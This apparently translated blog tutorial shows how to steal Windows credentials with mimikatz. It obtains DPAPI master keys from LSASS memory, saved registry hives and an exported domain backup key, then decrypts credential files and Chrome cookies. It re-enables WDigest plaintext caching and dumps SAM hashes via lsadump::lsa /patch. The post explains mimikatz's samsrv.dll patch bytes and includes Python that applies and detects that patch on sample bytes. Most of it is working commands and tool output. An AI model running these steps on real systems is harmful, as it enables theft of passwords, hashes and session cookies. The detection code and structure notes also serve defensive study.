0x01 DPAPI
On Windows, most of a user's encrypted data is stored with DPAPI. To decrypt that data you must first obtain the DPAPI Master Key that protects it.
Master Key:
64 bytes, used to decrypt DPAPI blobs. It is stored encrypted inside the Master Key file; the encryption key is derived from the user's logon password, the user's SID and a 16-byte random salt (the dpapi::masterkey output below shows the parameters actually used: 8000 rounds of PBKDF2 with SHA-512, then AES-256).
Master Key file:
A binary file; decrypting it with the user's logon password yields the Master Key (system Master Key files are decrypted with the DPAPI_SYSTEM secret instead, and domain users' files can additionally be decrypted with the domain backup key, see below).
Two kinds:
·User Master Key files, under %APPDATA%\Microsoft\Protect\%SID%
·System Master Key files, under %WINDIR%\System32\Microsoft\Protect\S-1-5-18\User
Preferred file:
Located in the same directory as the Master Key files; it records the GUID of the Master Key currently in use and its expiry time, 90 days by default (a new Master Key is generated once it expires, older keys are kept so old blobs stay decryptable).
First way to obtain the Master Key: from LSASS memory with sekurlsa::dpapi (requires SeDebugPrivilege, i.e. privilege::debug from an elevated prompt)
C:\Users\Administrator\Desktop>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 7 2021 23:11:27
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::dpapi
Authentication Id : 0 ; 3802506 (00000000:003a058a)
Session : Interactive from 4
User Name : Administrator
Domain : DESKTOP-PDJ677P
Logon Server : DESKTOP-PDJ677P
Logon Time : 2021/12/27 14:32:09
SID : S-1-5-21-1072968078-1304764695-2190947314-500
[00000000]
* GUID : {9976339e-85ee-48d4-8c0b-e184a5e8e3e7}
* Time : 2021/12/27 14:38:06
* MasterKey : cdbc5c6ca9be21bb584d2a5b692742c7213fff9bc9468929c159ecd5c52214b6b8a0c9760b6b5dc8cab752907cc7ff721bcbc0a83c1a4bb5bcbf9c8d15226ea5
* sha1(key) : 1fce13f1d82b9c434a22722d4680cb18ee1d7624
Second way to obtain the Master Key: from the DPAPI_SYSTEM LSA secret in saved SYSTEM/SECURITY hives (offline, no LSASS access needed)
reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SECURITY SECURITY.hiv
mimikatz(commandline) # lsadump::secrets /system:SystemBkup.hiv /security:SECURITY.hiv
Domain : DESKTOP-PDJ677P
SysKey : eada11fe853dbfd8986ea030bc73c2d4
Local name : DESKTOP-PDJ677P ( S-1-5-21-1072968078-1304764695-2190947314 )
Domain name : WORKGROUP
Policy subsystem is : 1.18
LSA Key(s) : 1, default {2c76e4db-7dc3-6020-6dbd-61b767e4cb08}
[00] {2c76e4db-7dc3-6020-6dbd-61b767e4cb08} 58d18249d3dccb44cc0a2fbb0be42785f7c9694993f22a87c86d8cf6ac15bea1
Secret : DefaultPassword
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 2d c1 5a ae 74 28 2d 18 fe 3d c4 a3 a2 58 3e 92 08 06 59 ed 8d b0 4a 00 9c 17 80 21 37 06 ef bf 9f 25 0c 4d de a6 ed d5
full: 2dc15aae74282d18fe3dc4a3a2583e92080659ed8db04a009c1780213706efbf9f250c4ddea6edd5
m/u : 2dc15aae74282d18fe3dc4a3a2583e92080659ed / 8db04a009c1780213706efbf9f250c4ddea6edd5
old/hex : 01 00 00 00 2b e4 e1 78 c8 0d 3b 9b ae 34 19 47 ef ea 3d 91 65 36 c4 52 4e 65 dc a9 5e 12 4a 43 50 10 d7 df 19 67 3f a7 61 c0 34 6c
full: 2be4e178c80d3b9bae341947efea3d916536c4524e65dca95e124a435010d7df19673fa761c0346c
m/u : 2be4e178c80d3b9bae341947efea3d916536c452 / 4e65dca95e124a435010d7df19673fa761c0346c
Secret : NL$KM
cur/hex : f1 08 2b af ef 1b 71 55 88 ad 31 b7 98 a6 4a e8 88 a4 02 8e 6f e4 84 25 21 6e 9f c4 15 72 2d 5a 26 6a 5f f5 3c 3a b1 4d b3 be ad e9 03 50 c0 65 d5 1a ce f9 d4 ed b6 10 3d 28 e9 15 3c 63 a5 54
old/hex : f1 08 2b af ef 1b 71 55 88 ad 31 b7 98 a6 4a e8 88 a4 02 8e 6f e4 84 25 21 6e 9f c4 15 72 2d 5a 26 6a 5f f5 3c 3a b1 4d b3 be ad e9 03 50 c0 65 d5 1a ce f9 d4 ed b6 10 3d 28 e9 15 3c 63 a5 54
DPAPI_SYSTEM is 40 bytes after the 4-byte revision header: the first 20 bytes are the machine key, the last 20 bytes the user key (mimikatz prints them as m/u). The user key, 8db04a009c1780213706efbf9f250c4ddea6edd5 here, decrypts the system Master Key files under %WINDIR%\System32\Microsoft\Protect\S-1-5-18\User; the machine key decrypts the files directly under S-1-5-18.
mimikatz(commandline) # dpapi::masterkey /in:C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\33b5feee-6eba-44ed-b392-259881512a96 /system:8db04a009c1780213706efbf9f250c4ddea6edd5
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {33b5feee-6eba-44ed-b392-259881512a96}
dwFlags : 00000006 - 6
dwMasterKeyLen : 000000b0 - 176
dwBackupKeyLen : 00000090 - 144
dwCredHistLen : 00000014 - 20
dwDomainKeyLen : 00000000 - 0
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 6269aa4d9b534424ec150afa4a457e98
rounds : 00001f40 - 8000
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : 2995628e6102ca962dd43eb24c502ee567e6f07a292b34db26c39df6f59894526d776415169697e587e99b52aba3734d136ac3011b26eb4603362262f6bfc14458d9dd4d25465919334e17fb64f146c4131f58e78ec21da3e5120faaee7906993bfdc6bc8cf6b13f7f26d07f1938618a2813a6bf3211ab10f2c1fee170902e278ec448aca32790b8cde550582119fd81
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 5e2757215a473242324d956a27ddded1
rounds : 00001f40 - 8000
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : 28f3584e2f0ff6e6bcd1f109a77c51457943234933288f0adfad243a9830fbb92c5537a3322ab27ff112001fb3ee16813db20734848b41ed1f118f157d73cfe95eda9830882028eb42d300e32152b037adf244fb235a9cb74803a1ef67267843e6d8f2feea711aef47c1fbe7a7b8d567
[credhist]
**CREDHIST INFO**
dwVersion : 00000003 - 3
guid : {00000000-0000-0000-0000-000000000000}
[masterkey] with DPAPI_SYSTEM: 8db04a009c1780213706efbf9f250c4ddea6edd5
key : e90feb451e17403a791af9fabad0b5f6d1b6692688ddc1d290110e83df21ec52577cc851c7d8d99ee03c429eac94e14e6a62a798908cb530cd670a9371cf0a72
sha1: 47cd40c7394d9caa469349d9cb057448d4052d83
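The structures the output above walks through (the master key file header and its masterkey/backupkey/credhist/domainkey sections, the Preferred file, and the DPAPI_SYSTEM secret split into its m/u halves) are simple enough to parse by hand. The following is an added example written for this page, not mimikatz or dpapick code. It parses constructed sample blobs built from the header values shown above (GUID, salt, rounds, algorithm IDs, section lengths); the ciphertext bytes in the samples are filler, and the Preferred expiry is assumed to be the sekurlsa::dpapi key time plus the default 90 days.

```python
"""Parsers for the on-disk DPAPI structures discussed above.

Added example, not mimikatz/dpapick code. Layouts follow the public DPAPI
master key file format (128-byte header, key records of 32 bytes + ciphertext,
CREDHIST link, optional domain key), the 24-byte Preferred file and the
44-byte DPAPI_SYSTEM LSA secret.
"""
import struct
import uuid
from datetime import datetime, timedelta, timezone

# CryptoAPI ALG_ID values that show up in master key records.
ALG_NAMES = {
    0x8004: "CALG_SHA1", 0x800C: "CALG_SHA_256", 0x800D: "CALG_SHA_384",
    0x800E: "CALG_SHA_512", 0x6603: "CALG_3DES", 0x660E: "CALG_AES_128",
    0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256",
}

# File header: version, 2 unknown DWORDs, GUID as 36 UTF-16LE chars (72 bytes),
# 2 unknown DWORDs, flags, then the four section lengths as QWORDs.
FILE_HDR = struct.Struct("<III72sIIIQQQQ")
# Key record: version, 16-byte salt, PBKDF2 rounds, hash ALG_ID, cipher ALG_ID,
# followed by (section length - 32) bytes of ciphertext (pbKey).
KEY_HDR = struct.Struct("<I16sIII")
CREDHIST = struct.Struct("<I16s")         # version + GUID of the CREDHIST entry
DOMAINKEY_HDR = struct.Struct("<III16s")  # version, secret len, access-check len, GUID
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def _guid(raw16: bytes) -> str:
    return "{%s}" % uuid.UUID(bytes_le=raw16)


def _key_record(section: bytes) -> dict:
    version, salt, rounds, alg_hash, alg_crypt = KEY_HDR.unpack_from(section)
    return {"version": version, "salt": salt, "rounds": rounds,
            "algHash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
            "algCrypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
            "pbKey": section[KEY_HDR.size:]}


def parse_masterkey_file(data: bytes) -> dict:
    """Split a master key file into header fields and its (optional) sections."""
    (version, _, _, guid16, _, _, flags,
     mk_len, bk_len, ch_len, dk_len) = FILE_HDR.unpack_from(data)
    out = {"version": version, "guid": "{%s}" % guid16.decode("utf-16-le"),
           "flags": flags, "masterkey": None, "backupkey": None,
           "credhist": None, "domainkey": None}
    off = FILE_HDR.size
    if mk_len:  # protected by the password-derived key (or DPAPI_SYSTEM)
        out["masterkey"] = _key_record(data[off:off + mk_len])
        off += mk_len
    if bk_len:  # local backup copy, same layout
        out["backupkey"] = _key_record(data[off:off + bk_len])
        off += bk_len
    if ch_len:
        ver, g = CREDHIST.unpack_from(data, off)
        out["credhist"] = {"version": ver, "guid": _guid(g)}
        off += ch_len
    if dk_len:  # domain users: secret is RSA-encrypted with the domain backup key (PVK)
        ver, s_len, a_len, g = DOMAINKEY_HDR.unpack_from(data, off)
        body = off + DOMAINKEY_HDR.size
        out["domainkey"] = {"version": ver, "guidMasterKey": _guid(g),
                            "pbSecret": data[body:body + s_len],
                            "pbAccessCheck": data[body + s_len:body + s_len + a_len]}
    return out


def parse_preferred(data: bytes) -> tuple:
    """Preferred = GUID of the master key in use + FILETIME expiry (24 bytes)."""
    raw_guid, filetime = struct.unpack_from("<16sQ", data)
    return _guid(raw_guid), FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def split_dpapi_system(secret: bytes) -> dict:
    """LSA secret DPAPI_SYSTEM: DWORD revision, 20-byte machine key, 20-byte user key."""
    (revision,) = struct.unpack_from("<I", secret)
    return {"revision": revision, "machine": secret[4:24], "user": secret[24:44]}


# ---- constructed samples (NOT real files) -----------------------------------
def build_sample_masterkey_file() -> bytes:
    """Header and record values copied from the dpapi::masterkey output above;
    the ciphertext bytes are filler, not the real pbKey."""
    mk = KEY_HDR.pack(2, bytes.fromhex("6269aa4d9b534424ec150afa4a457e98"),
                      8000, 0x800E, 0x6610) + b"\xaa" * 144
    bk = KEY_HDR.pack(2, bytes.fromhex("5e2757215a473242324d956a27ddded1"),
                      8000, 0x800E, 0x6610) + b"\xbb" * 112
    ch = CREDHIST.pack(3, b"\x00" * 16)
    guid = "33b5feee-6eba-44ed-b392-259881512a96".encode("utf-16-le")
    hdr = FILE_HDR.pack(2, 0, 0, guid, 0, 0, 6, len(mk), len(bk), len(ch), 0)
    return hdr + mk + bk + ch


# ASSUMPTION: expiry = the sekurlsa::dpapi key time (2021/12/27 14:38:06) + 90 days.
SAMPLE_PREFERRED_EXPIRY = datetime(2022, 3, 27, 14, 38, 6, tzinfo=timezone.utc)


def build_sample_preferred() -> bytes:
    """GUID from the sekurlsa::dpapi output above, expiry as assumed above."""
    filetime = ((SAMPLE_PREFERRED_EXPIRY - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10
    return uuid.UUID("9976339e-85ee-48d4-8c0b-e184a5e8e3e7").bytes_le + struct.pack("<Q", filetime)


if __name__ == "__main__":
    info = parse_masterkey_file(build_sample_masterkey_file())
    print(info["guid"], info["masterkey"]["rounds"], info["masterkey"]["algHash"])
    print(parse_preferred(build_sample_preferred()))
    sec = bytes.fromhex("01000000" "2dc15aae74282d18fe3dc4a3a2583e92080659ed"
                        "8db04a009c1780213706efbf9f250c4ddea6edd5")
    print(split_dpapi_system(sec)["user"].hex())
```

The parser stops at the ciphertext on purpose: the pbKey bytes still have to be decrypted with the derived key (the PBKDF2/AES parameters it reports), and the 64-byte Master Key is the tail of that decrypted buffer, which is what mimikatz prints as key/sha1 above. On a real host, read a file from %APPDATA%\Microsoft\Protect\%SID% into parse_masterkey_file to see which sections it carries; a non-zero domain key length is the sign that the PVK route in the domain section below applies.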
The Master Key can then be used to decrypt DPAPI-protected data, for example a Credential file:
dpapi::cred /in:C:\path\to\encrypted\file /masterkey:<master key hex>
Chrome's cookie database, %localappdata%\Google\Chrome\User Data\Default\Cookies, is handled the same way with dpapi::chrome (see the domain example below).
Decrypting a domain user's Master Key
For a domain user the Master Key file carries an extra domain key section: the Master Key is also protected by the domain's DPAPI backup key. lsadump::backupkeys /system:<domain controller> /export (Domain Admin rights are needed on the DC) yields a PVK file with the domain backup private key; it can decrypt every domain user's Master Key, and since the backup key is not rotated in practice, one export stays valid. Then
dpapi::masterkey /in:"C:\Users\xxxxx\AppData\Roaming\Microsoft\Protect\<SID>\ca748af3-8b95-40ae-8134-cb9534762688" /pvk:<exported PVK file>
decrypts that user's Master Key without knowing the password. As above, dpapi::chrome /in:Cookies /masterkey:a3fv34aedd7... then decrypts the contents of the Cookies database.
0x02 Dumping local passwords with mimikatz
See privilege::debug for the debug privilege this requires.
On systems before Windows 8.1 / Server 2012 R2 (and on older versions without KB2871997) the WDigest provider keeps the plaintext password in LSASS, so it can be dumped directly (there are other approaches, such as a custom SSP; only the registry method is described here).
WDigest
As the article above explains, on Windows 8.1 and later plaintext caching has to be re-enabled first:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
The value only affects logons that happen after the change, so a user must log on (or unlock) again before sekurlsa::wdigest shows the plaintext. Writing this value is a well-known indicator and is commonly monitored.
lsadump::lsa /patch
Start with kuhl_m_lsadump.c. Here OpenProcess is used to open lsass.exe (found via the PID of the SamSs service it hosts) and obtain a handle with the access rights listed after the function:
BOOL kuhl_m_lsadump_lsa_getHandle(PKULL_M_MEMORY_HANDLE * hMemory, DWORD Flags)
{
    BOOL success = FALSE;
    SERVICE_STATUS_PROCESS ServiceStatusProcess;
    HANDLE hProcess;

    /* lsass.exe hosts the SamSs service, so its PID is looked up by service name */
    if(kull_m_service_getUniqueForName(L"SamSs", &ServiceStatusProcess))
    {
        /* Flags = the access rights listed below (PROCESS_VM_READ | ...) */
        if(hProcess = OpenProcess(Flags, FALSE, ServiceStatusProcess.dwProcessId))
        {
            /* wrap the process handle in a mimikatz memory handle used for later read/write */
            if(!(success = kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, hMemory)))
                CloseHandle(hProcess);
        }
        else PRINT_ERROR_AUTO(L"OpenProcess");
    }
    else PRINT_ERROR_AUTO(L"kull_m_service_getUniqueForName");
    return success;
}
PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION
For /inject one more right, PROCESS_CREATE_THREAD, is requested, because inject runs its code as a remote thread inside lsass.exe (not as a child process).
The command used here is:
mimikatz # lsadump::lsa /patch
Once kull_m_patch has applied the patch, control returns to NTSTATUS kuhl_m_lsadump_lsa(int argc, wchar_t * argv[]); because isPatch is true, it goes straight into the enumeration routine.
This makes the difference between patch and inject clear: both first open an LSA policy handle with LsaOpenPolicy and retrieve the current account-domain information with LsaQueryInformationPolicy, then connect to the SAM with SamConnect, enumerate the users and read each user's credentials.
With /patch the NTLM hash is obtained through the (now patched) SAM API from mimikatz's own process:
if(!aRemoteThread)   /* /patch path: no remote thread, query the SAM from this process */
{
    /* 0x31b is the access mask mimikatz requests on the user object */
    status = SamOpenUser(DomainHandle, 0x31b, rid, &hUser);
    if(NT_SUCCESS(status))
    {
        /* UserInternal1Information carries the LM/NT hashes; samsrv normally refuses it
           for untrusted callers, which is the check the patch skips */
        status = SamQueryInformationUser(hUser, UserInternal1Information, &pUserInfoBuffer);
        if(NT_SUCCESS(status))
        {
            kprintf(L"LM   : ");
            if(pUserInfoBuffer->Internal1.LmPasswordPresent)
                kull_m_string_wprintf_hex(pUserInfoBuffer->Internal1.LMHash, LM_NTLM_HASH_LENGTH, 0);
            kprintf(L"\nNTLM : ");
            if(pUserInfoBuffer->Internal1.NtPasswordPresent)
                kull_m_string_wprintf_hex(pUserInfoBuffer->Internal1.NTHash, LM_NTLM_HASH_LENGTH, 0);
            kprintf(L"\n");
            SamFreeMemory(pUserInfoBuffer);
        } else PRINT_ERROR(L"SamQueryInformationUser %08x\n", status);
        SamCloseHandle(hUser);
    } else PRINT_ERROR(L"SamOpenUser %08x\n", status);
}
The patch itself is also in the source, for both x64 and x86. After locating the base address of samsrv.dll inside lsass.exe's memory, the following bytes are used; taking x64 as the example:
BYTE PTRN_WALL_SampQueryInformationUserInternal[] = {0x49, 0x8d, 0x41, 0x20};
BYTE PATC_WIN5_NopNop[] = {0x90, 0x90};
BYTE PATC_WALL_JmpShort[] = {0xeb, 0x04};
mimikatz searches samsrv.dll's memory for the signature 49 8d 41 20 (lea rax, [r9+0x20]) and, at a build-specific offset from that match, writes either 90 90 (two NOPs, for Windows 5.x builds) or eb 04 (a short jump, for later builds); the two patches are alternatives chosen by Windows version, not applied one after the other.
In the disassembly screenshot, the red breakpoint marks the instruction that was replaced with "eb 04". "eb 04" is a two-byte unconditional short jump that skips the following 4 bytes: the access check (on the 0x20 flag) is bypassed and execution proceeds straight to the call of the internal SAM function SampRetrieveUserPasswords.
Finally the NTLM and LM hashes are printed from SAMPR_USER_INTERNAL1_INFORMATION.
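The search-then-overwrite step above, and the defensive mirror image of it (checking whether the bytes at the patch site in a mapped samsrv.dll are still the original ones), are shown in the following added example. It is written for this page and is not mimikatz's kull_m_patch code. The signature and patch bytes are the x64 values listed above; the image it works on is a constructed byte string, not real samsrv.dll code, and the +4 distance between the signature and the patched bytes is an assumption made for the sample (the real distance is build-specific and mimikatz keeps it in a per-build table).

```python
"""Signature search, patch and detection for the samsrv.dll patch applied by
lsadump::lsa /patch. Added example; not mimikatz's kull_m_patch code."""

# x64 signature and patch bytes as listed in mimikatz's kuhl_m_lsadump.c.
PTRN_WALL_SampQueryInformationUserInternal = bytes([0x49, 0x8D, 0x41, 0x20])  # lea rax,[r9+0x20]
PATC_WIN5_NopNop = bytes([0x90, 0x90])    # Windows 5.x builds: NOP NOP
PATC_WALL_JmpShort = bytes([0xEB, 0x04])  # later builds: jmp short, skips the next 4 bytes

# ASSUMPTION: the distance between the signature and the patched bytes is
# build-specific (mimikatz keeps it in a per-build table); this example uses +4,
# i.e. the two bytes right after the lea.
PATCH_OFFSET = 4


def find_pattern(image: bytes, pattern: bytes) -> int:
    """Offset of the unique occurrence of pattern; refuse ambiguous matches."""
    first = image.find(pattern)
    if first < 0:
        raise LookupError("signature not found")
    if image.find(pattern, first + 1) >= 0:
        raise LookupError("signature is not unique")
    return first


def apply_patch(image: bytes, patch: bytes,
                pattern: bytes = PTRN_WALL_SampQueryInformationUserInternal,
                offset: int = PATCH_OFFSET) -> bytes:
    """Return a copy of image with patch written at (match + offset)."""
    at = find_pattern(image, pattern) + offset
    return image[:at] + patch + image[at + len(patch):]


def short_jmp_target(image: bytes, at: int) -> int:
    """Decode 'EB rel8': target = address after the 2-byte instruction + rel8."""
    if image[at] != 0xEB:
        raise ValueError("not a short jmp at offset %d" % at)
    rel = int.from_bytes(image[at + 1:at + 2], "little", signed=True)
    return at + 2 + rel


def detect_patch(image: bytes,
                 pattern: bytes = PTRN_WALL_SampQueryInformationUserInternal,
                 offset: int = PATCH_OFFSET):
    """Defensive check: which patch bytes, if any, sit at the patch location."""
    at = find_pattern(image, pattern) + offset
    window = image[at:at + 2]
    if window == PATC_WALL_JmpShort:
        return "jmp short"
    if window == PATC_WIN5_NopNop:
        return "nop nop"
    return None


# Constructed stand-in for the relevant bytes of samsrv.dll's code (NOT the
# real module): padding, the lea signature, two bytes the patch overwrites,
# four bytes the short jump skips (standing for the access check), then a call.
SAMPLE_IMAGE = (b"\xcc" * 8
                + PTRN_WALL_SampQueryInformationUserInternal
                + b"\x41\x41"                  # overwritten by the patch
                + b"\x42\x42\x42\x42"          # skipped by jmp short +4
                + b"\xe8\x00\x00\x00\x00"      # call placeholder (SampRetrieveUserPasswords)
                + b"\xcc" * 8)


if __name__ == "__main__":
    patched = apply_patch(SAMPLE_IMAGE, PATC_WALL_JmpShort)
    at = find_pattern(patched, PTRN_WALL_SampQueryInformationUserInternal) + PATCH_OFFSET
    target = short_jmp_target(patched, at)
    print("jmp at %d lands on %d (byte %#x)" % (at, target, patched[target]))
    print("detect:", detect_patch(SAMPLE_IMAGE), detect_patch(patched))
```

short_jmp_target makes the point that "eb 04" is two bytes long and lands four bytes past its own end, which is why exactly the four bytes between the patch site and the call disappear from the control flow. detect_patch is the same search run in reverse: fed the samsrv.dll mapping read out of lsass (or out of a memory dump) it tells you whether the patch bytes are present; comparing the mapped code against the module on disk is the more general form of that check.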
Finally:
mimikatz # lsadump::lsa /patch
Domain : WIN-3KBTCNK0556 / S-1-5-21-*******
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : ***************
RID : 000001f5 (501)
User : Guest
LM :
For the details of the SAM internals, see scz's three articles on the SAM.
References
DPAPI
scz
scz 03: XP samsrv.dll decryption flow
mimikatz /patch /inject